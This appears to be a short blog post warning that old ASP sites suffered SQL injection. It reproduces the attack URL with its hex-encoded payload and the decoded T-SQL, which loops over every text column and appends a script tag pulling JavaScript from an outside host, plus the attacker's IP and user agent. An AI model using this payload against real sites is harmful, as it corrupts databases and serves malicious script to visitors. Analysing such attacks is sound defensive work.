Work sites attacked

2 minute read Published:


Just an FYI – some of our old sites are not filtering out injection

attacks and got hosed last weekend. The attack seems fairly

sophisticated (imo) and is described in this post.

orderitem.asp?IT=GM-204;DECLARE%[email protected]%20NVARCHAR(4000);SET%[email protected]=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000

4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055

00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900

73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069

006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000

62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031

0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00

200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043

0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00

27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C

005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00

6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045

00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000

43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075

00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);–

If you just copy the hex value from this URL, as this…

0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007600610072006300680061007200280032003500

3500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C

00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C007300

7900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E0078007400790070

0065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F00

7200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062

006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F004300750072007300

6F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D003000290020

0042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B0040004300

2B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B0027

0027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F00

31002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062

006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F00

43007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200

And convert this to ASCII value, u can convert hex to ASCII

I got this…

DECLARE @T varchar(255)’@C varchar(255) DECLARE Table_Cursor CURSOR FOR

select a.name’b.name from sysobjects a’syscolumns b where a.id=b.id and

a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or

b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T’@C

WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update [‘[email protected]+’] set

[‘[email protected]+’]=rtrim(convert(varchar’[‘[email protected]+’]))+”<script

src=nihaorr1.com/1.js></script>”’)FETCH NEXT FROM

Table_Cursor INTO @T’@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

SQL Server Injection!!!! Here you can see the script being inserted

using Table Cursors, to each column in the table. If you read the code

you can see how each table in the entire database will be affected from

this.

The source of this came from 219.153.46.28,

28.46.153.219.broad.cq.cq.dynamic.163data.com.cn, the Agent is Indy

Library a CHINESE Bot. The agent Indy Library should be blocked entirly.

our attacks were similar and also coming from [219.153.46.28]

——————–

if you’ve got crappy/insecure code out there – be warned

Published by in geek using 223 words.

comments powered by Disqus